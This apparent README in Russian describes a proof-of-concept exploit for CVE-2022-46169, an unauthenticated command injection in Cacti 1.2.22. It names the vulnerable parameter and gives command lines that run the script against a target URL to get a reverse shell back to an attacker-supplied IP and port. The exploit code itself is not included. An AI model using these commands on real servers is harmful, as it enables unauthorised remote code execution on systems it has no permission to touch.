
Эксплойт Proof-of-concept для CVE-2022-46169, позволяющий неаутентифицированное удаленное выполнение кода через внедрение команд в Cacti 1.2.22.
Это скрипт доказательства концепции (POC) для уязвимости CVE-2022-46169, затрагивающей Cacti версии 1.2.22.
Уязвимость CVE-2022-46169 позволяет неавторизованную инъекцию команд в Cacti версиях до 1.2.22 включительно для достижения неавторизованного удаленного выполнения кода от имени пользователя www-data. Уязвимость вызвана некорректной проверкой пользовательского ввода в параметре "host_id" файла "remote_agent.php".
python CVE-2022-46169.py --url <TARGET_URL> --ip <YOUR_IP> --port <YOUR_PORT>
Замените <TARGET_URL> на URL целевой установки Cacti, <YOUR_IP> на IP-адрес машины, на которую вы хотите получить обратную оболочку, и <YOUR_PORT> на номер порта, на который вы хотите получить обратную оболочку.
Пример:
python CVE-2022-46169.py --url http://10.10.11.211 --ip 10.10.14.5 --port 1337
Этот скрипт POC предназначен только для образовательных целей. Используйте его на свой страх и риск. Автор этого скрипта не несет ответственности за любой ущерб, причиненный использованием этого скрипта. Ссылки